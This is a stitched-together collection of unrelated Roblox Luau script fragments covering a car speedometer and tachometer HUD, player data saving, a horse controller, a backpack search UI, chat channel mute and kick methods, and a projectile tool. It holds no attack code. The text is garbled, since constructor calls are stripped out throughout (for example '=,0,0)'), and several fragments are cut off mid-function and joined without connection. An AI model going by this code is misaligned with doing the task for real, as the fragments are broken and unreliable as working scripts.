if autoscaling then local Drive={} if _Tune.Config == "FWD" or _Tune.Config == "AWD" then if car.Wheels:FindFirstChild("FL")~= nil then table.insert(Drive,car.Wheels.FL) end if car.Wheels:FindFirstChild("FR")~= nil then table.insert(Drive,car.Wheels.FR) end if car.Wheels:FindFirstChild("F")~= nil then table.insert(Drive,car.Wheels.F) end end if _Tune.Config == "RWD" or _Tune.Config == "AWD" then if car.Wheels:FindFirstChild("RL")~= nil then table.insert(Drive,car.Wheels.RL) end if car.Wheels:FindFirstChild("RR")~= nil then table.insert(Drive,car.Wheels.RR) end if car.Wheels:FindFirstChild("R")~= nil then table.insert(Drive,car.Wheels.R) end end local wDia = 0 for i,v in pairs(Drive) do if v.Size.x>wDia then wDia = v.Size.x end end Drive = nil for i,v in pairs(UNITS) do v.maxSpeed = math.ceil(v.scaling*wDia*math.pi*_lRPM/60/_Tune.Ratios[#_Tune.Ratios]/_Tune.FinalDrive/_Tune.FDMult) v.spInc = math.max(math.ceil(v.maxSpeed/150)*10,10) end end for i=0,revEnd*2 do local ln = gauges.ln:clone() ln.Parent = gauges.Tach ln.Rotation = 45 + i * 225 / (revEnd*2) ln.Num.Text = i/2 ln.Num.Rotation = -ln.Rotation if i*500>=math.floor(_pRPM/500)*500 then ln.Frame.BackgroundColor3 =,0,0) if i<revEnd*2 then ln2 = ln:clone() ln2.Parent = gauges.Tach ln2.Rotation = 45 + (i+.5) * 225 / (revEnd*2) ln2.Num:Destroy() ln2.Visible=true end end if i%2==0 then ln.Frame.Size =,3,0,10) ln.Frame.Position =,-1,0,100) ln.Num.Visible = true else ln.Num:Destroy() end ln.Visible=true end local lns ="Frame",gauges.Speedo) lns.Name = "lns" lns.BackgroundTransparency = 1 lns.BorderSizePixel = 0 lns.Size =,0,0,0) for i=1,90 do local ln = gauges.ln:clone() ln.Parent = lns ln.Rotation = 45 + 225*(i/90) if i%2==0 then ln.Frame.Size =,2,0,10) ln.Frame.Position =,-1,0,100) else ln.Frame.Size =,3,0,5) end ln.Num:Destroy() ln.Visible=true end local blns ="Frame",gauges.Boost) blns.Name = "blns" blns.BackgroundTransparency = 1 blns.BorderSizePixel = 0 blns.Size =,0,0,0) for i=0,12 do local bln = gauges.bln:clone() bln.Parent = blns bln.Rotation = 45+270*(i/12) if i%2==0 then bln.Frame.Size =,2,0,7) bln.Frame.Position =,-1,0,40) else bln.Frame.Size =,3,0,5) end bln.Num:Destroy() bln.Visible=true end for i,v in pairs(UNITS) do local lnn ="Frame",gauges.Speedo) lnn.BackgroundTransparency = 1 lnn.BorderSizePixel = 0 lnn.Size =,0,0,0) lnn.Name = v.units if i~= 1 then lnn.Visible=false end for i=0,v.maxSpeed,v.spInc do local ln = gauges.ln:clone() ln.Parent = lnn ln.Rotation = 45 + 225*(i/v.maxSpeed) ln.Num.Text = i ln.Num.TextSize = 14 ln.Num.Rotation = -ln.Rotation ln.Frame:Destroy() ln.Num.Visible=true ln.Visible=true end end if isOn.Value then gauges:TweenPosition(, 0, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end isOn.Changed:connect(function() if isOn.Value then gauges:TweenPosition(, 0, 0, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,1,true) end end) values.RPM.Changed:connect(function() gauges.Tach.Needle.Rotation = 45 + 225 * math.min(1,values.RPM.Value / (revEnd*1000)) end) local _TCount = 0 if _Tune.Aspiration ~= "Natural" then if _Tune.Aspiration == "Single" then _TCount = 1 elseif _Tune.Aspiration == "Double" then _TCount = 2 end values.Boost.Changed:connect(function() local boost = (math.floor(values.Boost.Value)*1.2)-((_Tune.Boost*_TCount)/5) gauges.Boost.Needle.Rotation = 45 + 270 * math.min(1,(values.Boost.Value/(_Tune.Boost)/_TCount)) gauges.PSI.Text = tostring(math.floor(boost).." PSI") end) else gauges.Boost:Destroy() end values.Gear.Changed:connect(function() local gearText = values.Gear.Value if gearText == 0 then gearText = "N" elseif gearText == -1 then gearText = "R" end gauges.Gear.Text = gearText end) values.TCS.Changed:connect(function() if _Tune.TCSEnabled then if values.TCS.Value then gauges.TCS.TextColor3 =,170/255,0) gauges.TCS.TextStrokeColor3 =,170/255,0) if values.TCSActive.Value then wait() gauges.TCS.Visible = not gauges.TCS.Visible else wait() gauges.TCS.Visible = false end else gauges.TCS.Visible = true gauges.TCS.TextColor3 =,0,0) gauges.TCS.TextStrokeColor3 =,0,0) end else gauges.TCS.Visible = false end end) values.TCSActive.Changed:connect(function() if _Tune.TCSEnabled then if values.TCSActive.Value and values.TCS.Value then wait() gauges.TCS.Visible = not gauges.TCS.Visible elseif not values.TCS.Value then wait() gauges.TCS.Visible = true else wait() gauges.TCS.Visible = false end else gauges.TCS.Visible = false end end) gauges.TCS.Changed:connect(function() if _Tune.TCSEnabled then if values.TCSActive.Value and values.TCS.Value then wait() gauges.TCS.Visible = not gauges.TCS.Visible elseif not values.TCS.Value then wait() gauges.TCS.Visible = true end else if gauges.TCS.Visible then gauges.TCS.Visible = false end end end) values.ABS.Changed:connect(function() if _Tune.ABSEnabled then if values.ABS.Value then gauges.ABS.TextColor3 =,170/255,0) gauges.ABS.TextStrokeColor3 =,170/255,0) if values.ABSActive.Value then wait() gauges.ABS.Visible = not gauges.ABS.Visible else wait() gauges.ABS.Visible = false end else gauges.ABS.Visible = true gauges.ABS.TextColor3 =,0,0) gauges.ABS.TextStrokeColor3 =,0,0) end else gauges.ABS.Visible = false end end) values.ABSActive.Changed:connect(function() if _Tune.ABSEnabled then if values.ABSActive.Value and values.ABS.Value then wait() gauges.ABS.Visible = not gauges.ABS.Visible elseif not values.ABS.Value then wait() gauges.ABS.Visible = true else wait() gauges.ABS.Visible = false end else gauges.ABS.Visible = false end end) gauges.ABS.Changed:connect(function() if _Tune.ABSEnabled then if values.ABSActive.Value and values.ABS.Value then wait() gauges.ABS.Visible = not gauges.ABS.Visible elseif not values.ABS.Value then wait() gauges.ABS.Visible = true end else if gauges.ABS.Visible then gauges.ABS.Visible = false end end end) function PBrake() gauges.PBrake.Visible = values.PBrake.Value end values.PBrake.Changed:connect(PBrake) function Gear() if values.TransmissionMode.Value == "Auto" then gauges.TMode.Text = "A/T" gauges.TMode.BackgroundColor3 =,170/255,0) elseif values.TransmissionMode.Value == "Semi" then gauges.TMode.Text = "S/T" gauges.TMode.BackgroundColor3 =, 170/255, 127/255) else gauges.TMode.Text = "M/T" gauges.TMode.BackgroundColor3 =,85/255,.5) end end values.TransmissionMode.Changed:connect(Gear) values.Velocity.Changed:connect(function(property) gauges.Speedo.Needle.Rotation = 45 + 225 * math.min(1,UNITS[currentUnits].scaling*values.Velocity.Value.Magnitude/UNITS[currentUnits].maxSpeed) gauges.Speed.Text = math.floor(UNITS[currentUnits].scaling*values.Velocity.Value.Magnitude) .. " "..UNITS[currentUnits].units end) mouse.KeyDown:connect(function(key) if key=="v" then gauges.Visible=not gauges.Visible end end) gauges.Speed.MouseButton1Click:connect(function() if currentUnits==#UNITS then currentUnits = 1 else currentUnits = currentUnits+1 end for i,v in pairs(gauges.Speedo:GetChildren()) do v.Visible=v.Name==UNITS[currentUnits].units or v.Name=="Needle" or v.Name=="lns" end gauges.Speed.Text = math.floor(UNITS[currentUnits].scaling*values.Velocity.Value.Magnitude) .. " "..UNITS[currentUnits].units end) wait(.1) Gear() PBrake()
-- Decompiled with the Synapse X Luau decompiler.
local l__LocalPlayer__1 = game.Players.LocalPlayer; local v2 = { value = 0 }; local v3 ="BindableEvent"); v3.Name = script.Name; v3.Parent = script; v2.event = v3; if game:GetService("ReplicatedStorage"):WaitForChild("GameData"):WaitForChild("InGame").Value == true then game.Players.LocalPlayer:WaitForChild("Gold").Changed:connect(function(p1) v2.value = p1; v3:Fire(p1); end); end; return v2;
-- A redundant check for those who loaded before the server runs this script
for i,v in pairs(game.Players:GetPlayers()) do if storage.GetData(v.UserId) == nil then storage.LoadData(v.UserId) end end game.Players.PlayerAdded:connect(function(player) storage.LoadData(player.UserId) end) game.Players.PlayerRemoving:connect(function(player) storage.SaveData(player.UserId) end)
-- Variables
local MainGui = script.Parent local TextButton = MainGui.Frame.TextLabel.TextButton local sound = game.StarterPack.Phone.ClickSound TextButton.MouseButton1Up:Connect(function() sound:Play() end)
--Made by Luckymaxer
Players = game:GetService("Players") Debris = game:GetService("Debris") UserInputService = game:GetService("UserInputService") ContextActionService = game:GetService("ContextActionService") Player = Players.LocalPlayer Character = Player.Character Mouse = Player:GetMouse() Humanoid = nil for i, v in pairs(Character:GetChildren()) do if v:IsA("Humanoid") then Humanoid = v break end end ServerControl = script:WaitForChild("ServerControl").Value function InvokeServer(mode, value) pcall(function() local ServerReturn = ServerControl:InvokeServer(mode, value) return ServerReturn end) end function Dismount() if DisableJump then DisableJump:disconnect() end InvokeServer("Dismount") if UserInputService.TouchEnabled then ContextActionService:UnbindAction("RidableHorse_Dismount") end end if Humanoid then DisableJump = Humanoid.Changed:connect(function(Property) if Property == "Jump" then Humanoid.Jump = false InvokeServer("Jump") end end) end UserInputService.InputBegan:connect(function(InputObject) if InputObject.KeyCode == Enum.KeyCode.LeftControl or InputObject.KeyCode == Enum.KeyCode.RightControl then Dismount() end end)
Tune.ABSEnabled = true -- Implements ABS Tune.ABSThreshold = 20 -- Slip speed allowed before ABS starts working (in SPS) Tune.FBrakeForce = 1300 -- Front brake force Tune.RBrakeForce = 1500 -- Rear brake force Tune.PBrakeForce = 5000 -- Handbrake force Tune.FLgcyBForce = 15000 -- Front brake force [PGS OFF] Tune.RLgcyBForce = 10000 -- Rear brake force [PGS OFF] Tune.LgcyPBForce = 25000 -- Handbrake force [PGS OFF]
--local PlayerGui = game.Players.LocalPlayer:WaitForChild("PlayerGui") --PlayerGui:SetTopbarTransparency(0)
--------END RIGHT DOOR --------
game.Workspace.LightedDoorON.Value = false end script.Parent.ClickDetector.MouseClick:connect(onClicked)
-- Force direction
function EjectionForce.CalculateForce() return math.random(270,320) / 10, -- Side to side math.random(50,70) / 10, -- Up -math.random(300,320) / 10 -- Front ) end
--Make the gamepad hint frame
local gamepadHintsFrame = Utility:Create'Frame' { Name = "GamepadHintsFrame", Size =, HotbarFrame.Size.X.Offset, 0, (IsTenFootInterface and 95 or 60)), BackgroundTransparency = 1, Visible = false, Parent = MainFrame } local function addGamepadHint(hintImage, hintImageLarge, hintText) local hintFrame = Utility:Create'Frame' { Name = "HintFrame", Size =, 0, 1, -5), Position =, 0, 0, 0), BackgroundTransparency = 1, Parent = gamepadHintsFrame } local hintImage = Utility:Create'ImageLabel' { Name = "HintImage", Size = (IsTenFootInterface and,90,0,90) or,60,0,60)), BackgroundTransparency = 1, Image = (IsTenFootInterface and hintImageLarge or hintImage), Parent = hintFrame } local hintText = Utility:Create'TextLabel' { Name = "HintText", Position =, (IsTenFootInterface and 100 or 70), 0, 0), Size =, -(IsTenFootInterface and 100 or 70), 1, 0), Font = Enum.Font.SourceSansBold, FontSize = (IsTenFootInterface and Enum.FontSize.Size36 or Enum.FontSize.Size24), BackgroundTransparency = 1, Text = hintText, TextColor3 =,1,1), TextXAlignment = Enum.TextXAlignment.Left, TextWrapped = true, Parent = hintFrame } local textSizeConstraint ="UITextSizeConstraint", hintText) textSizeConstraint.MaxTextSize = hintText.TextSize end local function resizeGamepadHintsFrame() gamepadHintsFrame.Size =, HotbarFrame.Size.X.Offset, 0, (IsTenFootInterface and 95 or 60)) gamepadHintsFrame.Position =, HotbarFrame.Position.X.Offset, InventoryFrame.Position.Y.Scale, InventoryFrame.Position.Y.Offset - gamepadHintsFrame.Size.Y.Offset) local spaceTaken = 0 local gamepadHints = gamepadHintsFrame:GetChildren() --First get the total space taken by all the hints for i = 1, #gamepadHints do gamepadHints[i].Size =, 0, 1, -5) gamepadHints[i].Position =, 0, 0, 0) spaceTaken = spaceTaken + (gamepadHints[i].HintText.Position.X.Offset + gamepadHints[i].HintText.TextBounds.X) end --The space between all the frames should be equal local spaceBetweenElements = (gamepadHintsFrame.AbsoluteSize.X - spaceTaken)/(#gamepadHints - 1) for i = 1, #gamepadHints do gamepadHints[i].Position = (i == 1 and, 0, 0, 0) or, gamepadHints[i-1].Position.X.Offset + gamepadHints[i-1].Size.X.Offset + spaceBetweenElements, 0, 0)) gamepadHints[i].Size =, (gamepadHints[i].HintText.Position.X.Offset + gamepadHints[i].HintText.TextBounds.X), 1, -5) end end addGamepadHint("rbxasset://textures/ui/Settings/Help/XButtonDark.png", "rbxasset://textures/ui/Settings/Help/[email protected]", "Remove From Hotbar") addGamepadHint("rbxasset://textures/ui/Settings/Help/AButtonDark.png", "rbxasset://textures/ui/Settings/Help/[email protected]", "Select/Swap") addGamepadHint("rbxasset://textures/ui/Settings/Help/BButtonDark.png", "rbxasset://textures/ui/Settings/Help/[email protected]", "Close Backpack") do -- Search stuff local searchFrame = NewGui('Frame', 'Search') searchFrame.BackgroundColor3 = SEARCH_BACKGROUND_COLOR searchFrame.BackgroundTransparency = SEARCH_BACKGROUND_FADE searchFrame.Size =, SEARCH_WIDTH - (SEARCH_BUFFER * 2), 0, INVENTORY_HEADER_SIZE - (SEARCH_BUFFER * 2)) searchFrame.Position =, -searchFrame.Size.X.Offset - SEARCH_BUFFER, 0, SEARCH_BUFFER) searchFrame.Parent = InventoryFrame local searchBox = NewGui('TextBox', 'TextBox') searchBox.PlaceholderText = SEARCH_TEXT searchBox.ClearTextOnFocus = false searchBox.FontSize = Enum.FontSize.Size24 searchBox.TextXAlignment = Enum.TextXAlignment.Left searchBox.Size = searchFrame.Size - UDim2.fromOffset(0, SEARCH_TEXT_OFFSET_FROMLEFT) searchBox.Position =, SEARCH_TEXT_OFFSET_FROMLEFT, 0, 0) searchBox.Parent = searchFrame local xButton = NewGui('TextButton', 'X') xButton.Text = 'x' xButton.ZIndex = 10 xButton.TextColor3 = SLOT_EQUIP_COLOR xButton.FontSize = Enum.FontSize.Size24 xButton.TextYAlignment = Enum.TextYAlignment.Bottom xButton.BackgroundColor3 = SEARCH_BACKGROUND_COLOR xButton.BackgroundTransparency = 0 xButton.Size =, searchFrame.Size.Y.Offset - (SEARCH_BUFFER * 2), 0, searchFrame.Size.Y.Offset - (SEARCH_BUFFER * 2)) xButton.Position =, -xButton.Size.X.Offset - (SEARCH_BUFFER * 2), 0.5, -xButton.Size.Y.Offset / 2) xButton.Visible = false xButton.ZIndex = 0 xButton.BorderSizePixel = 0 xButton.Parent = searchFrame local function search() local terms = {} for word in searchBox.Text:gmatch('%S+') do terms[word:lower()] = true end local hitTable = {} for i = NumberOfHotbarSlots + 1, #Slots do -- Only search inventory slots local slot = Slots[i] local hits = slot:CheckTerms(terms) table.insert(hitTable, {slot, hits}) slot.Frame.Visible = false slot.Frame.Parent = InventoryFrame end table.sort(hitTable, function(left, right) return left[2] > right[2] end) ViewingSearchResults = true local hitCount = 0 for i, data in ipairs(hitTable) do local slot, hits = data[1], data[2] if hits > 0 then slot.Frame.Visible = true slot.Frame.Parent = UIGridFrame slot.Frame.LayoutOrder = NumberOfHotbarSlots + hitCount hitCount = hitCount + 1 end end ScrollingFrame.CanvasPosition =, 0) UpdateScrollingFrameCanvasSize() xButton.ZIndex = 3 end local function clearResults() if xButton.ZIndex > 0 then ViewingSearchResults = false for i = NumberOfHotbarSlots + 1, #Slots do local slot = Slots[i] slot.Frame.LayoutOrder = slot.Index slot.Frame.Parent = UIGridFrame slot.Frame.Visible = true end xButton.ZIndex = 0 end UpdateScrollingFrameCanvasSize() end local function reset() clearResults() searchBox.Text = '' end local function onChanged(property) if property == 'Text' then local text = searchBox.Text if text == '' then clearResults() elseif text ~= SEARCH_TEXT then search() end xButton.Visible = text ~= '' and text ~= SEARCH_TEXT end end local function focusLost(enterPressed) if enterPressed then --TODO: Could optimize search() end end xButton.MouseButton1Click:Connect(reset) searchBox.Changed:Connect(onChanged) searchBox.FocusLost:Connect(focusLost) BackpackScript.StateChanged.Event:Connect(function(isNowOpen) InventoryIcon:getInstance("iconButton").Modal = isNowOpen -- Allows free mouse movement even in first person if not isNowOpen then reset() end end) HotkeyFns[Enum.KeyCode.Escape.Value] = function(isProcessed) if isProcessed then -- Pressed from within a TextBox reset() elseif InventoryFrame.Visible then InventoryIcon:deselect() end end local function detectGamepad(lastInputType) if lastInputType == Enum.UserInputType.Gamepad1 and not UserInputService.VREnabled then searchFrame.Visible = false else searchFrame.Visible = true end end UserInputService.LastInputTypeChanged:Connect(detectGamepad) end GuiService.MenuOpened:Connect(function() if InventoryFrame.Visible then InventoryIcon:deselect() end end) do -- Make the Inventory expand/collapse arrow (unless TopBar) local removeHotBarSlot = function(name, state, input) if state ~= Enum.UserInputState.Begin then return end if not GuiService.SelectedObject then return end for i = 1, NumberOfHotbarSlots do if Slots[i].Frame == GuiService.SelectedObject and Slots[i].Tool then Slots[i]:MoveToInventory() return end end end local function openClose() if not next(Dragging) then -- Only continue if nothing is being dragged InventoryFrame.Visible = not InventoryFrame.Visible local nowOpen = InventoryFrame.Visible AdjustHotbarFrames() HotbarFrame.Active = not HotbarFrame.Active for i = 1, NumberOfHotbarSlots do Slots[i]:SetClickability(not nowOpen) end end if InventoryFrame.Visible then if GamepadEnabled then if GAMEPAD_INPUT_TYPES[UserInputService:GetLastInputType()] then resizeGamepadHintsFrame() gamepadHintsFrame.Visible = not UserInputService.VREnabled end enableGamepadInventoryControl() end if BackpackPanel and VRService.VREnabled then BackpackPanel:SetVisible(true) BackpackPanel:RequestPositionUpdate() end else if GamepadEnabled then gamepadHintsFrame.Visible = false end disableGamepadInventoryControl() end if InventoryFrame.Visible then ContextActionService:BindAction("RBXRemoveSlot", removeHotBarSlot, false, Enum.KeyCode.ButtonX) else ContextActionService:UnbindAction("RBXRemoveSlot") end BackpackScript.IsOpen = InventoryFrame.Visible BackpackScript.StateChanged:Fire(InventoryFrame.Visible) end StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Backpack, false) BackpackScript.OpenClose = openClose -- Exposed end
-- Gradually regenerates the Humanoid's Health over time.
local REGEN_RATE = 10 / 100 -- Regenerate this fraction of MaxHealth per second. local REGEN_STEP = 5 -- Wait this long between each regeneration step.
-- Value containing selected game mode
local SelectedMode = script:WaitForChild("SelectedMode")
--[ Services ]:
local RunSrv = game:GetService("RunService"); local Wrks = game:GetService("Workspace"); local Plrs = game:GetService("Players");
--[[ Renderless component used to detect when a user clicks/taps anywhere outside of another component. Users commonly expect that a modal will be hidden when clicking anywhere outside of it, so this component allows you to set up that functionality. Usage: local FocusLostTest = Roact.Component:extend("FocusLostTest") function FocusLostTest:init() self.frame = Roact.createRef() end function FocusLostTest:render() return Roact.createFragment({ Frame = Roact.createElement("Frame", { Size = UDim2.fromOffset(100, 100), [Roact.Ref] = self.frame, }), FocusLost = Roact.createElement(FocusLost, { ref = self.frame, callback = self.props.callback, }), }) end ]]
local FocusLost = Roact.Component:extend("FocusLost") local defaultProps = { UserInputService = UserInputService, } export type Props = typeof(defaultProps) & { ref: any, -- Roact ref callback: () -> (), } FocusLost.defaultProps = defaultProps function FocusLost:init() self.wasRefClicked = function(input: InputObject) local props: Props = self.props local ref = props.ref:getValue() if ref then local playerGui: BasePlayerGui = ref:FindFirstAncestorWhichIsA("BasePlayerGui") if playerGui then for _, gui in ipairs(playerGui:GetGuiObjectsAtPosition(input.Position.X, input.Position.Y)) do if gui == ref or gui:IsDescendantOf(ref) then return true end end end end return false end self.handleFocusLost = function(input: InputObject) local props: Props = self.props if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then if not self.wasRefClicked(input) then props.callback() end end end end function FocusLost:render() local props: Props = self.props return Roact.createFragment({ InputEnded = Roact.createElement(ExternalEventConnection, { callback = self.handleFocusLost, event = props.UserInputService.InputEnded, }), TouchTap = Roact.createElement(ExternalEventConnection, { callback = self.handleFocusLost, event = props.UserInputService.TouchTap, }), }) end return FocusLost
--////////////////////////////// Methods --//////////////////////////////////////
local methods = {} methods.__index = methods function methods:SendSystemMessage(message, extraData) local messageObj = self:InternalCreateMessageObject(message, nil, true, extraData) local success, err = pcall(function() self.eMessagePosted:Fire(messageObj) end) if not success and err then print("Error posting message: " ..err) end self:InternalAddMessageToHistoryLog(messageObj) for i, speaker in pairs(self.Speakers) do speaker:InternalSendSystemMessage(messageObj, self.Name) end return messageObj end function methods:SendSystemMessageToSpeaker(message, speakerName, extraData) local speaker = self.Speakers[speakerName] if (speaker) then local messageObj = self:InternalCreateMessageObject(message, nil, true, extraData) speaker:InternalSendSystemMessage(messageObj, self.Name) else warn(string.format("Speaker '%s' is not in channel '%s' and cannot be sent a system message", speakerName, self.Name)) end end function methods:SendMessageObjToFilters(message, messageObj, fromSpeaker) local oldMessage = messageObj.Message messageObj.Message = message self:InternalDoMessageFilter(fromSpeaker.Name, messageObj, self.Name) self.ChatService:InternalDoMessageFilter(fromSpeaker.Name, messageObj, self.Name) local newMessage = messageObj.Message messageObj.Message = oldMessage return newMessage end function methods:CanCommunicateByUserId(userId1, userId2) if RunService:IsStudio() then return true end -- UserId is set as 0 for non player speakers. if userId1 == 0 or userId2 == 0 then return true end local success, canCommunicate = pcall(function() return Chat:CanUsersChatAsync(userId1, userId2) end) return success and canCommunicate end function methods:CanCommunicate(speakerObj1, speakerObj2) local player1 = speakerObj1:GetPlayer() local player2 = speakerObj2:GetPlayer() if player1 and player2 then return self:CanCommunicateByUserId(player1.UserId, player2.UserId) end return true end function methods:SendMessageToSpeaker(message, speakerName, fromSpeakerName, extraData) local speakerTo = self.Speakers[speakerName] local speakerFrom = self.ChatService:GetSpeaker(fromSpeakerName) if speakerTo and speakerFrom then local isMuted = speakerTo:IsSpeakerMuted(fromSpeakerName) if isMuted then return end if not self:CanCommunicate(speakerTo, speakerFrom) then return end -- We need to claim the message is filtered even if it not in this case for compatibility with legacy client side code. local isFiltered = speakerName == fromSpeakerName local messageObj = self:InternalCreateMessageObject(message, fromSpeakerName, isFiltered, extraData) message = self:SendMessageObjToFilters(message, messageObj, fromSpeakerName) speakerTo:InternalSendMessage(messageObj, self.Name) local filteredMessage = self.ChatService:InternalApplyRobloxFilter(messageObj.FromSpeaker, message, speakerName) if filteredMessage then messageObj.Message = filteredMessage messageObj.IsFiltered = true speakerTo:InternalSendFilteredMessage(messageObj, self.Name) end else warn(string.format("Speaker '%s' is not in channel '%s' and cannot be sent a message", speakerName, self.Name)) end end function methods:KickSpeaker(speakerName, reason) local speaker = self.ChatService:GetSpeaker(speakerName) if (not speaker) then error("Speaker \"" .. speakerName .. "\" does not exist!") end local messageToSpeaker = "" local messageToChannel = "" if (reason) then messageToSpeaker = string.format("You were kicked from '%s' for the following reason(s): %s", self.Name, reason) messageToChannel = string.format("%s was kicked for the following reason(s): %s", speakerName, reason) else messageToSpeaker = string.format("You were kicked from '%s'", self.Name) messageToChannel = string.format("%s was kicked", speakerName) end self:SendSystemMessageToSpeaker(messageToSpeaker, speakerName) speaker:LeaveChannel(self.Name) self:SendSystemMessage(messageToChannel) end function methods:MuteSpeaker(speakerName, reason, length) local speaker = self.ChatService:GetSpeaker(speakerName) if (not speaker) then error("Speaker \"" .. speakerName .. "\" does not exist!") end self.Mutes[speakerName:lower()] = (length == 0 or length == nil) and 0 or (os.time() + length) if (reason) then self:SendSystemMessage(string.format("%s was muted for the following reason(s): %s", speakerName, reason)) end local success, err = pcall(function() self.eSpeakerMuted:Fire(speakerName, reason, length) end) if not success and err then print("Error mutting speaker: " ..err) end local spkr = self.ChatService:GetSpeaker(speakerName) if (spkr) then local success, err = pcall(function() spkr.eMuted:Fire(self.Name, reason, length) end) if not success and err then print("Error mutting speaker: " ..err) end end end function methods:UnmuteSpeaker(speakerName) local speaker = self.ChatService:GetSpeaker(speakerName) if (not speaker) then error("Speaker \"" .. speakerName .. "\" does not exist!") end self.Mutes[speakerName:lower()] = nil local success, err = pcall(function() self.eSpeakerUnmuted:Fire(speakerName) end) if not success and err then print("Error unmuting speaker: " ..err) end local spkr = self.ChatService:GetSpeaker(speakerName) if (spkr) then local success, err = pcall(function() spkr.eUnmuted:Fire(self.Name) end) if not success and err then print("Error unmuting speaker: " ..err) end end end function methods:IsSpeakerMuted(speakerName) return (self.Mutes[speakerName:lower()] ~= nil) end function methods:GetSpeakerList() local list = {} for i, speaker in pairs(self.Speakers) do table.insert(list, speaker.Name) end return list end function methods:RegisterFilterMessageFunction(funcId, func, priority) if self.FilterMessageFunctions:HasFunction(funcId) then error(string.format("FilterMessageFunction '%s' already exists", funcId)) end self.FilterMessageFunctions:AddFunction(funcId, func, priority) end function methods:FilterMessageFunctionExists(funcId) return self.FilterMessageFunctions:HasFunction(funcId) end function methods:UnregisterFilterMessageFunction(funcId) if not self.FilterMessageFunctions:HasFunction(funcId) then error(string.format("FilterMessageFunction '%s' does not exists", funcId)) end self.FilterMessageFunctions:RemoveFunction(funcId) end function methods:RegisterProcessCommandsFunction(funcId, func, priority) if self.ProcessCommandsFunctions:HasFunction(funcId) then error(string.format("ProcessCommandsFunction '%s' already exists", funcId)) end self.ProcessCommandsFunctions:AddFunction(funcId, func, priority) end function methods:ProcessCommandsFunctionExists(funcId) return self.ProcessCommandsFunctions:HasFunction(funcId) end function methods:UnregisterProcessCommandsFunction(funcId) if not self.ProcessCommandsFunctions:HasFunction(funcId) then error(string.format("ProcessCommandsFunction '%s' does not exist", funcId)) end self.ProcessCommandsFunctions:RemoveFunction(funcId) end local function DeepCopy(table) local copy = {} for i, v in pairs(table) do if (type(v) == table) then copy[i] = DeepCopy(v) else copy[i] = v end end return copy end function methods:GetHistoryLog() return DeepCopy(self.ChatHistory) end function methods:GetHistoryLogForSpeaker(speaker) local userId = -1 local player = speaker:GetPlayer() if player then userId = player.UserId end local chatlog = {} for i = 1, #self.ChatHistory do local logUserId = self.ChatHistory[i].SpeakerUserId if self:CanCommunicateByUserId(userId, logUserId) then table.insert(chatlog, DeepCopy(self.ChatHistory[i])) end end return chatlog end
--[=[ Calls [Janitor.Cleanup](#Cleanup) and renders the Janitor unusable. :::warning Running this will make any attempts to call a function of Janitor error. ::: ]=]
function Janitor:Destroy() self:Cleanup() table.clear(self) setmetatable(self, nil) end Janitor.__call = Janitor.Cleanup
--Rescripted by Luckymaxer
Tool = script.Parent Handle = Tool:WaitForChild("Handle") Players = game:GetService("Players") Debris = game:GetService("Debris") Speed = 100 Duration = 9999999 NozzleOffset =, 0.4, -1.1) Sounds = { Fire = Handle:WaitForChild("Fire"), Reload = Handle:WaitForChild("Reload"), HitFade = Handle:WaitForChild("HitFade") } PointLight = Handle:WaitForChild("PointLight") ServerControl = (Tool:FindFirstChild("ServerControl") or"RemoteFunction")) ServerControl.Name = "ServerControl" ServerControl.Parent = Tool ClientControl = (Tool:FindFirstChild("ClientControl") or"RemoteFunction")) ClientControl.Name = "ClientControl" ClientControl.Parent = Tool ServerControl.OnServerInvoke = (function(player, Mode, Value, arg) if player ~= Player or Humanoid.Health == 0 or not Tool.Enabled then return end if Mode == "Click" and Value then Activated(arg) end end) function InvokeClient(Mode, Value) pcall(function() ClientControl:InvokeClient(Player, Mode, Value) end) end function TagHumanoid(humanoid, player) local Creator_Tag ="ObjectValue") Creator_Tag.Name = "creator" Creator_Tag.Value = player Debris:AddItem(Creator_Tag, 2) Creator_Tag.Parent = humanoid end function UntagHumanoid(humanoid) for i, v in pairs(humanoid:GetChildren()) do if v:IsA("ObjectValue") and v.Name == "creator" then v:Destroy() end end end function FindCharacterAncestor(Parent) if Parent and Parent ~= game:GetService("Workspace") then local humanoid = Parent:FindFirstChild("Humanoid") if humanoid then return Parent, humanoid else return FindCharacterAncestor(Parent.Parent) end end return nil end function GetTransparentsRecursive(Parent, PartsTable) local PartsTable = (PartsTable or {}) for i, v in pairs(Parent:GetChildren()) do local TransparencyExists = false pcall(function() local Transparency = v["Transparency"] if Transparency then TransparencyExists = true end end) if TransparencyExists then table.insert(PartsTable, v) end GetTransparentsRecursive(v, PartsTable) end return PartsTable end function SelectionBoxify(Object) local SelectionBox ="SelectionBox") SelectionBox.Adornee = Object SelectionBox.Color ="Toothpaste") SelectionBox.Parent = Object return SelectionBox end local function Light(Object) local Light = PointLight:Clone() Light.Range = (Light.Range + 2) Light.Parent = Object end function FadeOutObjects(Objects, FadeIncrement) repeat local LastObject = nil for i, v in pairs(Objects) do v.Transparency = (v.Transparency + FadeIncrement) LastObject = v end wait() until LastObject.Transparency >= 1 or not LastObject end function Dematerialize(character, humanoid, FirstPart) if not character or not humanoid then return end humanoid.WalkSpeed = 0 local Parts = {} for i, v in pairs(character:GetChildren()) do if v:IsA("BasePart") then v.Anchored = true table.insert(Parts, v) elseif v:IsA("LocalScript") or v:IsA("Script") then v:Destroy() end end local SelectionBoxes = {} local FirstSelectionBox = SelectionBoxify(FirstPart) Light(FirstPart) wait(0) for i, v in pairs(Parts) do if v ~= FirstPart then table.insert(SelectionBoxes, SelectionBoxify(v)) Light(v) end end local ObjectsWithTransparency = GetTransparentsRecursive(character) FadeOutObjects(ObjectsWithTransparency, 0.1) wait(0.5) character:BreakJoints() humanoid.Health = 0 Debris:AddItem(character, 2) local FadeIncrement = 0.05 Delay(0.2, function() FadeOutObjects({FirstSelectionBox}, FadeIncrement) if character and character.Parent then character:Destroy() end end) FadeOutObjects(SelectionBoxes, FadeIncrement) end function Touched(Projectile, Hit) if not Hit or not Hit.Parent then return end local character, humanoid = FindCharacterAncestor(Hit) if character and humanoid and character ~= Character then local ForceFieldExists = false for i, v in pairs(character:GetChildren()) do if v:IsA("ForceField") then ForceFieldExists = true end end if not ForceFieldExists then if Projectile then local HitFadeSound = Projectile:FindFirstChild(Sounds.HitFade.Name) local torso = humanoid.Torso if HitFadeSound and torso then HitFadeSound.Parent = torso HitFadeSound:Play() end end Dematerialize(character, humanoid, Hit) 